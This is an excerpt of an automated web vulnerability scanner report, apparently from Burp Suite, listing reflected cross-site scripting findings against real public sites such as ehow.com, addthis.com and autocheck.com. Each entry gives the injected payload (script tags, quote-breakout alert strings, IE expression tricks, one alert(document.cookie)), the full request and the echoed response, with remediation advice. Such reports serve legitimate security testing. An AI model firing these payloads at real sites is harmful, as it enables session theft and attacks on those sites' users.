Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a38f0<script>alert(1)</script>9726beaea83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpa38f0<script>alert(1)</script>9726beaea83 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Tue, 01 Feb 2011 15:38:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=k78r7pgsm4fr4lff7iqm85a8p6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpa38f0<script>alert(1)</script>9726beaea83</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c5"-alert(1)-"0052ce52990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php7b7c5"-alert(1)-"0052ce52990 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Tue, 01 Feb 2011 15:38:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=etee9v0mo7s339efrl5f6v3n43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php7b7c5"-alert(1)-"0052ce52990"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.343. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da82f\" style=x:expression(alert(1)) 29d0b5c18ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=mc/da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18bailus HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mc/da82f\" style=x:expression(alert(1)) 29d0b5c18bailus" /> ...[SNIP]...
1.344. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0096"-alert(1)-"e20af2b4cfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/c0096"-alert(1)-"e20af2b4cfa HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/c0096"-alert(1)-"e20af2b4cfa"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 was submitted in the username parameter. This input was echoed as be264\" style=x:expression(alert(1)) a7df52ee127 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=mcilusbe264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mcilusbe264\" style=x:expression(alert(1)) a7df52ee127" /> ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca was submitted in the v parameter. This input was echoed as 696ca"style="x:expression(alert(1))"f3f01901aca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca&username=mcilus HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-250696ca"style="x:expression(alert(1))"f3f01901aca" /> ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9c4b4<script>alert(1)</script>af757eb65d0 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e19c4b4<script>alert(1)</script>af757eb65d0 HTTP/1.1
Host: www.astaro.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __unam=fa38af9-12dddaf19a7-13ff2714-1; k_visit=1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=112476180.1215039085.1296493738.1296493738.1296504424.2; __utma=1.546991621.1296493738.1296493738.1296493738.1
The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0cf8"%3balert(1)//cf9b759ede9 was submitted in the siteID parameter. This input was echoed as a0cf8";alert(1)//cf9b759ede9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?WT.mc_id=3499&siteID=3499a0cf8"%3balert(1)//cf9b759ede9 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:06 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.119221296661386602; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=cWs7WQE0rZngyYQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:12 GMT
Set-Cookie: JSESSIONID=cWs7WQE0rZngyYQcN3; path=/
Connection: close
Content-Type: text/html
Content-Length: 30580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1 ...[SNIP]... <!-- var opt_siteId="3499a0cf8";alert(1)//cf9b759ede9"; var opt_marketing_code=""; var opt_banner_id=""; //--> ...[SNIP]...
The value of the siteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3c6"><script>alert(1)</script>713dc893771 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?WT.mc_id=3499&siteID=34996d3c6"><script>alert(1)</script>713dc893771 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:06 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.132231296661386218; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=bIZSzpUOcIr54GQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:11 GMT
Set-Cookie: JSESSIONID=bIZSzpUOcIr54GQcN3; path=/
Connection: close
Content-Type: text/html
Content-Length: 30844
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcabd"><script>alert(1)</script>2e234cdb39e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html, HTTP/1.1
Host: www.cs.tut.fi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 04:07:33 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 1573
<p> <font size="-1" color="gray"> This server is <code>www.cs.tut.fi</code>, located at <a href="http://www ...[SNIP]... <a href="http://www.tut.fi/~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html,"> ...[SNIP]...
The value of the afterLogin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b was submitted in the afterLogin parameter. This input was echoed as 90c4e"style="x:expression(alert(1))"91e1a856a5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /account/simple_login.aspx?afterLogin=90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7281
<!DOCTYPE html> <html id="www-ehow-com"> <head> <title>Sign in to your eHow Account</title> <meta name="siteid" scheme="DMINSTR2" content="EHWC" /> <meta name="pagetype" scheme="DMINSTR2 ...[SNIP]... <form action="http://www.ehow.com/account/simple_login.aspx?afterLogin=90c4e"style="x:expression(alert(1))"91e1a856a5b" method="post"> ...[SNIP]...
The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0d0'%3balert(1)//1fa3188652 was submitted in the afterLogin parameter. This input was echoed as 7d0d0';alert(1)//1fa3188652 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/simple_login.aspx?afterLogin=7d0d0'%3balert(1)//1fa3188652 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7241
<!DOCTYPE html> <html id="www-ehow-com"> <head> <title>Sign in to your eHow Account</title> <meta name="siteid" scheme="DMINSTR2" content="EHWC" /> <meta name="pagetype" scheme="DMINSTR2 ...[SNIP]... ownerid : dlabs.user.id, cookie : '', session : 'axi0su55dyp0oq45zse1qr55', userid : dlabs.user.id, username : dlabs.user.name }; var afterLogin = '7d0d0';alert(1)//1fa3188652';
The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff930'%3balert(1)//5c2172634b4 was submitted in the afterLogin parameter. This input was echoed as ff930';alert(1)//5c2172634b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/simple_register.aspx?afterLogin=submit_frmMailff930'%3balert(1)//5c2172634b4 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22050
1.354. http://www.ehow.com/arts-and-crafts/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/arts-and-crafts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbed2'-alert(1)-'b6ad201675f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-crafts/?dbed2'-alert(1)-'b6ad201675f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72069
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Crafts - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/arts-and-crafts/?dbed2'-alert(1)-'b6ad201675f=1" ref="like" width="300"> ...[SNIP]...
1.355. http://www.ehow.com/arts-and-entertainment/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/arts-and-entertainment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59da'-alert(1)-'dafe2f9e7e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-entertainment/?d59da'-alert(1)-'dafe2f9e7e8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72268
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Entertainment - How To Information | eHow. ...[SNIP]... <fb:like href="http://www.ehow.com/arts-and-entertainment/?d59da'-alert(1)-'dafe2f9e7e8=1" ref="like" width="300"> ...[SNIP]...
1.356. http://www.ehow.com/beauty-and-personal-care/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/beauty-and-personal-care/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce2c5'-alert(1)-'b84718647fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beauty-and-personal-care/?ce2c5'-alert(1)-'b84718647fe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73561
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Beauty & Personal Care - How To Information | eHo ...[SNIP]... <fb:like href="http://www.ehow.com/beauty-and-personal-care/?ce2c5'-alert(1)-'b84718647fe=1" ref="like" width="300"> ...[SNIP]...
1.357. http://www.ehow.com/business/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/business/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76bb7'-alert(1)-'d74031893f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/?76bb7'-alert(1)-'d74031893f9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75314
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Business - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/business/?76bb7'-alert(1)-'d74031893f9=1" ref="like" width="300"> ...[SNIP]...
1.358. http://www.ehow.com/car-repair-and-maintenance/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/car-repair-and-maintenance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81bbf'-alert(1)-'0dd7b3504d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /car-repair-and-maintenance/?81bbf'-alert(1)-'0dd7b3504d5=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72997
